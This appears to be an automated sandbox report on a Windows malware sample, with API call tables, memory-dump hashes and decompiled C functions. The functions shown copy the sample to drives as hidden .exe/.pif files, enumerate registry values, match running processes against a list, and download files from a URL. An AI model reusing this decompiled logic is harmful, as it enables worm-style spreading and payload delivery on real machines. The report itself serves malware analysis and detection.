                                0x0221362b
                                0x0221362b
                                0x02213653
                                0x02213658
                                0x02213680
                                0x022136a2
                                0x022136af
                                0x022136be
                                0x022136e0
                                0x022136e6
                                0x022136ed
                                0x0221370d
                                0x0221371a
                                0x02213729
                                0x02213729
                                0x022136ed
                                0x00000000
                                0x022132ff
                                0x022132ff
                                0x0221331b
                                0x02213337
                                0x02213515
                                0x0221351c
                                0x00000000
                                0x0221335f
                                0x0221335f
                                0x0221336d
                                0x02213372
                                0x02213391
                                0x0221339e
                                0x022133aa
                                0x022133b4
                                0x022133ba
                                0x022133ba
                                0x022133c8
                                0x022133cd
                                0x022133d0
                                0x022133d7
                                0x022133dd
                                0x00000000
                                0x022133e8
                                0x022133ff
                                0x0221350b
                                0x022133e2
                                0x022133e2
                                0x022133e5
                                0x00000000
                                0x02213405
                                0x02213405
                                0x0221340b
                                0x02213417
                                0x0221341f
                                0x0221341f
                                0x02213425
                                0x00000000
                                0x0221342b
                                0x0221345d
                                0x0221345d
                                0x0221346b
                                0x02213479
                                0x02213486
                                0x0221348c
                                0x0221348f
                                0x02213498
                                0x022134ba
                                0x022134c0
                                0x022134c7
                                0x022134e7
                                0x022134f4
                                0x02213503
                                0x02213503
                                0x022134c7
                                0x02213509
                                0x00000000
                                0x022133ff
                                0x022133e8
                                0x022133d7
                                0x02213510
                                0x02213238
                                0x02213238
                                0x02213241
                                0x00000000
                                0x02213241
                                0x02213238
                                0x02213337
                                0x022132f9
                                0x022132b6
                                0x00000000
                                0x02213272

                                APIs
                                • Sleep.KERNEL32(00004E20), ref: 02213210
                                • GetLogicalDrives.KERNEL32 ref: 02213220
                                • GetDriveTypeA.KERNEL32(?), ref: 022132A3
                                • lstrcat.KERNEL32(?,02202740), ref: 022132CA
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 022132E6
                                • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0221331B
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0221332F
                                • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 02213391
                                • CharLowerA.USER32(?), ref: 0221339E
                                • lstrlen.KERNEL32(?), ref: 022133AB
                                • lstrcpy.KERNEL32(?,00000000), ref: 02213479
                                • GetFileAttributesA.KERNEL32(?), ref: 02213486
                                • CloseHandle.KERNEL32(?), ref: 02213498
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,?,00000020,00000000), ref: 022134B4
                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 022134E7
                                • CloseHandle.KERNEL32(000000FF), ref: 022134F4
                                • SetFileAttributesA.KERNEL32(?,00000007), ref: 02213503
                                • CloseHandle.KERNEL32(000000FF), ref: 0221351C
                                • GetFileAttributesA.KERNEL32(?), ref: 02213529
                                • SetFileAttributesA.KERNEL32(?,00000020), ref: 02213547
                                • DeleteFileA.KERNEL32(?), ref: 02213554
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,?,00000020,00000000), ref: 0221357F
                                • GetSystemTime.KERNEL32(?), ref: 0221359F
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 022135C8
                                • lstrcat.KERNEL32(?,.pif), ref: 0221362B
                                • lstrcat.KERNEL32(?,.exe), ref: 0221363F
                                • lstrlen.KERNEL32(?,?,00000000), ref: 0221366B
                                • WriteFile.KERNEL32(?,?,00000000), ref: 02213680
                                • SetFileTime.KERNEL32(?,?,?,?), ref: 022136A2
                                • CloseHandle.KERNEL32(?), ref: 022136AF
                                • SetFileAttributesA.KERNEL32(?,00000007), ref: 022136BE
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,?,00000020,00000000), ref: 022136DA
                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0221370D
                                • CloseHandle.KERNEL32(000000FF), ref: 0221371A
                                • SetFileAttributesA.KERNEL32(?,00000007), ref: 02213729
                                • Sleep.KERNEL32(00001B58), ref: 02213739
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$Time$Attributes$CloseHandle$Create$SystemWritelstrcat$Sleeplstrlen$CharDeleteDriveDrivesLogicalLowerReadTypelstrcpy
                                • String ID: :$\
                                • API String ID: 3104407473-1166558509
                                • Opcode ID: 8f170caf56a6fb6710c339ac664479b85ef7cb54049cc4a0de561d7cfdb43a02
                                • Instruction ID: b6858bc89d05016a258193b1c7c044a392d48bc3f2c87ecd7160c82fc420ecc5
                                • Opcode Fuzzy Hash: 8f170caf56a6fb6710c339ac664479b85ef7cb54049cc4a0de561d7cfdb43a02
                                • Instruction Fuzzy Hash: 8A51AC75E10269EBDF24CBA4CC84AEEB7B6BF85704F0485D9E109EA184D7349AA5CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 56%
                                			E0221174A(void* _a4) {
                                				int* _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				char* _v32;
                                				void _v291;
                                				char _v292;
                                				void _v551;
                                				char _v552;
                                				void* _v556;
                                				int _v560;
                                				int _v564;
                                				int _v568;
                                				int _v572;
                                				intOrPtr _t51;
                                				char* _t61;
                                				void* _t64;
                                				intOrPtr _t69;
                                				intOrPtr _t76;
                                				intOrPtr _t90;
                                				void* _t103;
                                				intOrPtr _t104;
                                				intOrPtr _t105;
                                				void* _t108;
                                				intOrPtr _t113;
                                
                                				_push(0xffffffff);
                                				_push(0x2203ff8);
                                				_push(0x2218090);
                                				_push( *[fs:0x0]);
                                				 *[fs:0x0] = _t104;
                                				_t105 = _t104 + 0xfffffdd8;
                                				_v28 = _t105;
                                				_v8 = 0;
                                				_v572 = 0;
                                				_v564 = 0;
                                				_v568 = 0;
                                				_v560 = 0;
                                				_v292 = 0;
                                				memset( &_v291, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v552 = 0;
                                				memset( &_v551, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				Sleep(0x1000);
                                				_t51 =  *0x21e17cc; // 0x220267c
                                				_push(_t51);
                                				_t76 =  *0x21e16a8; // 0x2202210
                                				_push(_t76);
                                				wsprintfA( &_v292, "%s%s");
                                				_t108 = _t105 + 0x28;
                                				if(RegOpenKeyExA(_a4,  &_v292, 0, 0x20019,  &_v556) == 0) {
                                					_v572 = 0;
                                					while(1) {
                                						_v564 = 0xff;
                                						_v560 = 0;
                                						_v568 = 0xff;
                                						if(RegEnumValueA(_v556, _v572,  &_v292,  &_v564, 0,  &_v560,  &_v552,  &_v568) != 0) {
                                							break;
                                						}
                                						_t90 =  *0x21e17fc; // 0x22026f0
                                						_t61 = E02208DEB( &_v552, _t90);
                                						_t108 = _t108 + 8;
                                						_v32 = _t61;
                                						if(_v32 != 0) {
                                							_t64 =  *0x21e114c( &_v552);
                                							 *((char*)(_t103 + _t64 -  *0x21e114c(_v32) - 0x220)) = 0;
                                							_v32 =  &_v552;
                                							if( *_v32 == 0x22) {
                                								_t69 = _v32 + 1;
                                								_t113 = _t69;
                                								_v32 = _t69;
                                							}
                                							E0220E329(_v32, _t113, _v32, 0, 0);
                                							_t108 = _t108 + 0xc;
                                							Sleep(0x400);
                                						}
                                						_v572 = _v572 + 1;
                                					}
                                					RegCloseKey(_v556);
                                				}
                                				_v8 = 0xffffffff;
                                				 *[fs:0x0] = _v20;
                                				return 1;
                                			}



























                                0x0221174d
                                0x0221174f
                                0x02211754
                                0x0221175f
                                0x02211760
                                0x02211767
                                0x02211770
                                0x02211773
                                0x0221177a
                                0x02211784
                                0x0221178e
                                0x02211798
                                0x022117a2
                                0x022117b6
                                0x022117b8
                                0x022117ba
                                0x022117bb
                                0x022117cf
                                0x022117d1
                                0x022117d3
                                0x022117d9
                                0x022117df
                                0x022117e4
                                0x022117e5
                                0x022117eb
                                0x022117f8
                                0x022117fe
                                0x02211822
                                0x02211828
                                0x02211843
                                0x02211843
                                0x0221184d
                                0x02211857
                                0x0221189c
                                0x00000000
                                0x00000000
                                0x0221189e
                                0x022118ac
                                0x022118b1
                                0x022118b4
                                0x022118bb
                                0x022118c4
                                0x022118d8
                                0x022118e6
                                0x022118f2
                                0x022118f7
                                0x022118f7
                                0x022118fa
                                0x022118fa
                                0x02211905
                                0x0221190a
                                0x02211912
                                0x02211912
                                0x0221183d
                                0x0221183d
                                0x02211928
                                0x02211928
                                0x0221192e
                                0x0221194f
                                0x0221195c

                                APIs
                                • Sleep.KERNEL32(00001000,?,?,?,00000000,02218090,02203FF8,000000FF,?,02213AFC,80000001), ref: 022117D9
                                • wsprintfA.USER32 ref: 022117F8
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0221181A
                                • RegEnumValueA.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 02211894
                                • lstrlen.KERNEL32(?), ref: 022118C4
                                • lstrlen.KERNEL32(00000000), ref: 022118D0
                                • Sleep.KERNEL32(00000400), ref: 02211912
                                • RegCloseKey.ADVAPI32(?), ref: 02211928
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Sleeplstrlen$CloseEnumOpenValuewsprintf
                                • String ID: %s%s
                                • API String ID: 1665585142-3252725368
                                • Opcode ID: fb6d0a00c8d78221c2d82b8e5582ce3631a55005609841361386867b5856026c
                                • Instruction ID: 681316a05a8170eb07389357fa6e296de844ba3f38e6fa7aaebe93759f613e55
                                • Opcode Fuzzy Hash: fb6d0a00c8d78221c2d82b8e5582ce3631a55005609841361386867b5856026c
                                • Instruction Fuzzy Hash: EA517171D50219EBDB20CFE4DC88BEEB7F4AB08704F004699E619AA284D7799A94CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 96%
                                			E02209C4F() {
                                				void _v263;
                                				char _v264;
                                				int _v268;
                                				signed int _v272;
                                				void* _v276;
                                				int _v280;
                                				char _v540;
                                				int _v568;
                                				void _v572;
                                				void* _v576;
                                				void* _t69;
                                				void* _t72;
                                				void* _t80;
                                				void* _t84;
                                				void* _t119;
                                				void* _t120;
                                				void* _t121;
                                
                                				_v272 = 0;
                                				_v268 = 0;
                                				_v280 = 0;
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				_t120 = _t119 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				_v276 = CreateToolhelp32Snapshot(2, 0);
                                				if(_v276 != 0) {
                                					_v576 = 0;
                                					memset( &_v572, 0, 0x49 << 2);
                                					_t121 = _t120 + 0xc;
                                					_v576 = 0x128;
                                					if(Process32First(_v276,  &_v576) != 0) {
                                						CharUpperA( &_v540);
                                						_v272 = 0;
                                						while( *((char*)( *((intOrPtr*)(0x21e1c50 + _v272 * 4)))) != 0) {
                                							_t84 = E02208DEB( &_v540,  *((intOrPtr*)(0x21e1c50 + _v272 * 4)));
                                							_t121 = _t121 + 8;
                                							if(_t84 == 0) {
                                								_v272 = _v272 + 1;
                                								continue;
                                							} else {
                                								E02209ACF(_v568);
                                								_t121 = _t121 + 4;
                                								_v280 = _v568;
                                								Sleep(0x400);
                                							}
                                							break;
                                						}
                                						if(_v568 != _v280) {
                                							_t80 = E02209B56(_v568);
                                							_t121 = _t121 + 4;
                                							if(_t80 != 0) {
                                								E02209ACF(_v568);
                                								_t121 = _t121 + 4;
                                								_v280 = _v568;
                                								Sleep(0x400);
                                							}
                                						}
                                						L11:
                                						while(Process32Next(_v276,  &_v576) != 0) {
                                							CharUpperA( &_v540);
                                							if(_v568 == _v280) {
                                								L21:
                                								continue;
                                							} else {
                                								_t69 = E02209B56(_v568);
                                								_t121 = _t121 + 4;
                                								if(_t69 == 0) {
                                									_v272 = 0;
                                									while( *((char*)( *((intOrPtr*)(0x21e1c50 + _v272 * 4)))) != 0) {
                                										_t72 = E02208DEB( &_v540,  *((intOrPtr*)(0x21e1c50 + _v272 * 4)));
                                										_t121 = _t121 + 8;
                                										if(_t72 == 0) {
                                											_v272 = _v272 + 1;
                                											continue;
                                										} else {
                                											E02209ACF(_v568);
                                											_t121 = _t121 + 4;
                                											_v280 = _v568;
                                											Sleep(0x400);
                                										}
                                										goto L21;
                                									}
                                									goto L21;
                                								} else {
                                									E02209ACF(_v568);
                                									_t121 = _t121 + 4;
                                									_v280 = _v568;
                                									Sleep(0x400);
                                									continue;
                                								}
                                							}
                                							L23:
                                						}
                                						goto L22;
                                					}
                                					goto L11;
                                				}
                                				L22:
                                				return CloseHandle(_v276);
                                				goto L23;
                                			}




















                                0x02209c59
                                0x02209c63
                                0x02209c6d
                                0x02209c77
                                0x02209c8b
                                0x02209c8b
                                0x02209c8d
                                0x02209c8f
                                0x02209c99
                                0x02209ca6
                                0x02209cac
                                0x02209cc3
                                0x02209cc3
                                0x02209cc5
                                0x02209ce4
                                0x02209cf1
                                0x02209cf7
                                0x02209d12
                                0x02209d3b
                                0x02209d40
                                0x02209d45
                                0x02209d0c
                                0x00000000
                                0x02209d47
                                0x02209d4e
                                0x02209d53
                                0x02209d5c
                                0x02209d67
                                0x02209d67
                                0x00000000
                                0x02209d45
                                0x02209d7d
                                0x02209d86
                                0x02209d8b
                                0x02209d90
                                0x02209d99
                                0x02209d9e
                                0x02209da7
                                0x02209db2
                                0x02209db2
                                0x02209d90
                                0x00000000
                                0x02209db8
                                0x02209dda
                                0x02209dec
                                0x02209ea7
                                0x00000000
                                0x02209df2
                                0x02209df9
                                0x02209dfe
                                0x02209e03
                                0x02209e2d
                                0x02209e48
                                0x02209e71
                                0x02209e76
                                0x02209e7b
                                0x02209e42
                                0x00000000
                                0x02209e7d
                                0x02209e84
                                0x02209e89
                                0x02209e92
                                0x02209e9d
                                0x02209e9d
                                0x00000000
                                0x02209e7b
                                0x00000000
                                0x02209e05
                                0x02209e0c
                                0x02209e11
                                0x02209e1a
                                0x02209e25
                                0x00000000
                                0x02209e25
                                0x02209e03
                                0x00000000
                                0x02209dec
                                0x00000000
                                0x02209db8
                                0x00000000
                                0x02209ce4
                                0x02209eac
                                0x02209ebd
                                0x00000000

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02209C94
                                • Process32First.KERNEL32(00000000,00000128), ref: 02209CDD
                                • CharUpperA.USER32(?,00000000,00000128,00000002,00000000), ref: 02209CF1
                                • Sleep.KERNEL32(00000400), ref: 02209D67
                                • Sleep.KERNEL32(00000400), ref: 02209DB2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 02209DC6
                                • CharUpperA.USER32(?,00000000,00000128,00000000,00000128,00000002,00000000), ref: 02209DDA
                                • Sleep.KERNEL32(00000400), ref: 02209E25
                                • Sleep.KERNEL32(00000400), ref: 02209E9D
                                • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 02209EB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Sleep$CharProcess32Upper$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3272108884-0
                                • Opcode ID: d61f22583763d500cc5e5dbc42aeacde43194a2c0c599c0926997db8b1091a83
                                • Instruction ID: 2834461fe9f39983e60d6fc4fedd16bd205999a73a1a00ca63bb6d9cd0e56eb9
                                • Opcode Fuzzy Hash: d61f22583763d500cc5e5dbc42aeacde43194a2c0c599c0926997db8b1091a83
                                • Instruction Fuzzy Hash: 7A519FB1D102189BDF24EBA0CD84BDAB3B5AF54704F0445D9D60AAB286D775AFC0CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 45%
                                			E02212B8E(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				signed int _v28;
                                				void _v287;
                                				char _v288;
                                				signed int _v292;
                                				signed int _v296;
                                				signed int _v300;
                                				intOrPtr _t88;
                                				signed int _t92;
                                				intOrPtr _t94;
                                				signed int _t97;
                                				signed int _t99;
                                				signed int _t106;
                                				signed int _t110;
                                				void* _t116;
                                				signed int _t119;
                                				signed int _t124;
                                				intOrPtr _t141;
                                				intOrPtr _t142;
                                				intOrPtr _t153;
                                				intOrPtr _t154;
                                				void* _t175;
                                				void* _t176;
                                				void* _t178;
                                
                                				_v292 = 0;
                                				_v296 = 0;
                                				_v300 = 0;
                                				_v288 = 0;
                                				memset( &_v287, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v28 = 0;
                                				_v24 = 0;
                                				_v20 = 0;
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v8 = 0;
                                				_t141 =  *0x21e171c; // 0x220249c
                                				_v28 = _t141;
                                				_t153 =  *0x21e1720; // 0x22024a4
                                				_v24 = _t153;
                                				_t88 =  *0x21e1724; // 0x22024b8
                                				_v20 = _t88;
                                				_t142 =  *0x21e1728; // 0x22024d0
                                				_v16 = _t142;
                                				_t154 =  *0x21e172c; // 0x22024e8
                                				_v12 = _t154;
                                				E02204060(_a4, 0, 0x400);
                                				_t178 = _t176 + 0x18;
                                				_t92 = E022044CB(_t142) & 0x0000ffff;
                                				asm("cdq");
                                				_t182 = _t92 % 0x67 - 0x50;
                                				if(_t92 % 0x67 > 0x50) {
                                					E02212A35(_t182, _a4);
                                					_t178 = _t178 + 4;
                                				}
                                				_t94 =  *0x21e1718; // 0x2202490
                                				 *0x21e106c(_a4, _t94);
                                				_t97 = E022044CB(_a4) & 0x0000ffff;
                                				asm("cdq");
                                				_t145 = 0x67;
                                				_t183 = _t97 % 0x67 - 0xa;
                                				if(_t97 % 0x67 > 0xa) {
                                					E02212A35(_t183, _a4);
                                					_t178 = _t178 + 4;
                                				}
                                				_v296 = 0;
                                				while(_v296 < 0x1e) {
                                					_t106 = E022044CB(_t145) & 3;
                                					if(_t106 < 0) {
                                						_t106 = (_t106 - 0x00000001 | 0xfffffffc) + 1;
                                					}
                                					_v300 = _t106;
                                					if(_v296 > 0x14) {
                                						_t145 = 5;
                                						_v300 = _v296 % 5;
                                					}
                                					if( *((intOrPtr*)(_t175 + _v300 * 4 - 0x18)) != 0) {
                                						_t110 = E022044CB(_t145) & 0x0000ffff;
                                						asm("cdq");
                                						_t190 = _t110 % 0x67 - 0xa;
                                						if(_t110 % 0x67 > 0xa) {
                                							E02212A35(_t190, _a4);
                                							_t178 = _t178 + 4;
                                						}
                                						 *0x21e1148( &_v288,  *((intOrPtr*)(_t175 + _v300 * 4 - 0x18)));
                                						 *((intOrPtr*)(_t175 + _v300 * 4 - 0x18)) = 0;
                                						E02212962( &_v288,  &_v288);
                                						_t116 = E02208DEB( &_v288, 0x2203df8);
                                						_t178 = _t178 + 0xc;
                                						if(_t116 == 0) {
                                							_t119 = E022044CB( &_v288);
                                							asm("cdq");
                                							if((_t119 & 0x0000ffff) % 0x65 > 0x32) {
                                								 *0x21e106c( &_v288, 0x2203dfc);
                                							}
                                							 *0x21e106c( &_v288, 0x2203e00);
                                							_t124 = E022044CB(0x65);
                                							asm("cdq");
                                							if((_t124 & 0x0000ffff) % 0x66 > 0x32) {
                                								 *0x21e106c( &_v288, 0x2203e04);
                                							}
                                							wsprintfA(_t175 +  *0x21e114c( &_v288, "%s", _a8) - 0x11c);
                                							_t178 = _t178 + 0xc;
                                						}
                                						_t145 = _a4;
                                						 *0x21e106c(_a4,  &_v288);
                                					}
                                					_v296 = _v296 + 1;
                                				}
                                				_t99 = E022044CB(_t145);
                                				asm("cdq");
                                				__eflags = (_t99 & 0x0000ffff) % 0x63 - 0x3c;
                                				if(__eflags > 0) {
                                					E02212A35(__eflags, _a4);
                                				}
                                				return _v292;
                                			}































                                0x02212b98
                                0x02212ba2
                                0x02212bac
                                0x02212bb6
                                0x02212bca
                                0x02212bcc
                                0x02212bce
                                0x02212bcf
                                0x02212bd8
                                0x02212bdb
                                0x02212bde
                                0x02212be1
                                0x02212be4
                                0x02212be7
                                0x02212bed
                                0x02212bf0
                                0x02212bf6
                                0x02212bf9
                                0x02212bfe
                                0x02212c01
                                0x02212c07
                                0x02212c0a
                                0x02212c10
                                0x02212c1e
                                0x02212c23
                                0x02212c2b
                                0x02212c30
                                0x02212c38
                                0x02212c3b
                                0x02212c41
                                0x02212c46
                                0x02212c46
                                0x02212c49
                                0x02212c53
                                0x02212c5e
                                0x02212c63
                                0x02212c64
                                0x02212c6b
                                0x02212c6e
                                0x02212c74
                                0x02212c79
                                0x02212c79
                                0x02212c7c
                                0x02212c97
                                0x02212cae
                                0x02212cb3
                                0x02212cb9
                                0x02212cb9
                                0x02212cba
                                0x02212cc7
                                0x02212cd1
                                0x02212cd8
                                0x02212cd8
                                0x02212ce9
                                0x02212cf4
                                0x02212cf9
                                0x02212d01
                                0x02212d04
                                0x02212d0a
                                0x02212d0f
                                0x02212d0f
                                0x02212d24
                                0x02212d30
                                0x02212d3f
                                0x02212d53
                                0x02212d58
                                0x02212d5d
                                0x02212d63
                                0x02212d6d
                                0x02212d78
                                0x02212d86
                                0x02212d86
                                0x02212d98
                                0x02212d9e
                                0x02212da8
                                0x02212db3
                                0x02212dc1
                                0x02212dc1
                                0x02212de5
                                0x02212deb
                                0x02212deb
                                0x02212df5
                                0x02212df9
                                0x02212df9
                                0x02212c91
                                0x02212c91
                                0x02212e04
                                0x02212e0e
                                0x02212e16
                                0x02212e19
                                0x02212e1f
                                0x02212e24
                                0x02212e31

                                APIs
                                  • Part of subcall function 022044CB: InterlockedExchange.KERNEL32(022190C0,0220A192), ref: 022044E9
                                • lstrcat.KERNEL32(?,02202490), ref: 02212C53
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02212D24
                                • lstrcat.KERNEL32(00000000,02203DFC), ref: 02212D86
                                • lstrcat.KERNEL32(00000000,02203E00), ref: 02212D98
                                • lstrcat.KERNEL32(00000000,02203E04), ref: 02212DC1
                                • lstrlen.KERNEL32(00000000,%s,02213658,?,?,?,?,?,?), ref: 02212DD7
                                  • Part of subcall function 02212A35: lstrlen.KERNEL32(00000000), ref: 02212A4E
                                  • Part of subcall function 02212A35: lstrcat.KERNEL32(00000000,02203DE0), ref: 02212A7C
                                  • Part of subcall function 02212A35: lstrcat.KERNEL32(00000000,02203DE4), ref: 02212AA2
                                  • Part of subcall function 02212A35: lstrcat.KERNEL32(00000000,02203DE8), ref: 02212AB1
                                  • Part of subcall function 02212A35: lstrlen.KERNEL32(00000000), ref: 02212B0C
                                  • Part of subcall function 02212A35: lstrcat.KERNEL32(00000000,02203DEC), ref: 02212B40
                                  • Part of subcall function 02212A35: lstrcat.KERNEL32(00000000,02203DF0), ref: 02212B66
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrcat$lstrlen$ExchangeInterlockedlstrcpy
                                • String ID: %s
                                • API String ID: 3361872186-3043279178
                                • Opcode ID: c3eb614f77047cf7329bb35830c1fc53801b036b3583d97b5a0dd7f07668afc8
                                • Instruction ID: f0f5a2c95e0101d24e0fee980d1f1bdc30e21e10e2cccb63e4fe129183aa8131
                                • Opcode Fuzzy Hash: c3eb614f77047cf7329bb35830c1fc53801b036b3583d97b5a0dd7f07668afc8
                                • Instruction Fuzzy Hash: 4F6191B5D10218DBDB14DBE4DC81BEE77F6EF5C300F1086A9E60996284D7349A95CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E02210945(void* __eflags, intOrPtr _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                				void _v263;
                                				char _v264;
                                				struct _OVERLAPPED* _v268;
                                				void _v1291;
                                				void _v1292;
                                				void* _v1296;
                                				void* _v1300;
                                				void* _v1304;
                                				long _v1308;
                                				long _v1312;
                                				void _v2335;
                                				char _v2336;
                                				char* _t65;
                                				long _t94;
                                				void* _t111;
                                				void* _t115;
                                				void* _t116;
                                
                                				_t116 = __eflags;
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				asm("stosb");
                                				_v1292 = 0;
                                				memset( &_v1291, 0, 0xff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v2336 = 0;
                                				memset( &_v2335, 0, 0xff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				 *0x21e1148( &_v2336, _a4);
                                				E0220A677(_t116,  &_v2336);
                                				_t115 = _t111 + 0x28;
                                				_v1312 = 0x104;
                                				_v1308 = 0;
                                				_v268 = 0;
                                				if( *0x22190b0 == 0 ||  *0x22190a8 == 0 ||  *0x2219010 == 0 ||  *0x2219070 == 0) {
                                					L25:
                                					return _v268;
                                				} else {
                                					_t65 =  *0x21e1690; // 0x2202120
                                					_v1296 = InternetOpenA(_t65, 1, 0, 0, 0);
                                					if(_v1296 == 0) {
                                						L21:
                                						if(_v1304 != 0) {
                                							InternetCloseHandle(_v1304);
                                						}
                                						if(_v1296 != 0) {
                                							InternetCloseHandle(_v1296);
                                						}
                                						goto L25;
                                					}
                                					_v1304 = InternetOpenUrlA(_v1296,  &_v2336, 0, 0, 0x84000000, 0);
                                					if(_v1304 != 0) {
                                						if(_a8 != 0) {
                                							_v1300 = CreateFileA(_a8, 0x40000000, 2, 0, 2, 0x80, 0);
                                						}
                                						do {
                                							if(InternetReadFile(_v1304,  &_v1292, 0x400,  &_v1308) != 0 && _v1308 != 0) {
                                								if(_a8 != 0 && _v1300 != 0xffffffff) {
                                									WriteFile(_v1300,  &_v1292, _v1308,  &_v1312, 0);
                                								}
                                								if(_a12 == 0) {
                                									L18:
                                									_t94 = _v268 + _v1308;
                                									__eflags = _t94;
                                									_v268 = _t94;
                                									goto L19;
                                								} else {
                                									if(_v268 >= _a16 || _v268 + _v1308 > _a16) {
                                										break;
                                									} else {
                                										__eflags = _a12 + _v268;
                                										E0221772B(_a12 + _v268,  &_v1292, _v1308);
                                										_t115 = _t115 + 0xc;
                                										goto L18;
                                									}
                                								}
                                							}
                                							L19:
                                							__eflags = _v1308;
                                						} while (_v1308 != 0);
                                						CloseHandle(_v1300);
                                					}
                                					goto L21;
                                				}
                                			}




















                                0x02210945
                                0x0221094f
                                0x02210963
                                0x02210965
                                0x02210966
                                0x0221097a
                                0x0221097c
                                0x0221097e
                                0x0221097f
                                0x02210993
                                0x02210995
                                0x02210997
                                0x022109a3
                                0x022109b0
                                0x022109b5
                                0x022109b8
                                0x022109c2
                                0x022109cc
                                0x022109dd
                                0x02210b8f
                                0x02210b99
                                0x02210a0a
                                0x02210a12
                                0x02210a1e
                                0x02210a2b
                                0x02210b63
                                0x02210b6a
                                0x02210b73
                                0x02210b73
                                0x02210b80
                                0x02210b89
                                0x02210b89
                                0x00000000
                                0x02210b80
                                0x02210a50
                                0x02210a5d
                                0x02210a67
                                0x02210a85
                                0x02210a85
                                0x02210a8b
                                0x02210aad
                                0x02210ac4
                                0x02210aed
                                0x02210aed
                                0x02210af7
                                0x02210b37
                                0x02210b3d
                                0x02210b3d
                                0x02210b43
                                0x00000000
                                0x02210af9
                                0x02210b02
                                0x00000000
                                0x02210b17
                                0x02210b28
                                0x02210b2f
                                0x02210b34
                                0x00000000
                                0x02210b34
                                0x02210b02
                                0x02210af7
                                0x02210b49
                                0x02210b49
                                0x02210b49
                                0x02210b5d
                                0x02210b5d
                                0x00000000
                                0x02210a5d

                                APIs
                                • lstrcpy.KERNEL32(?,?), ref: 022109A3
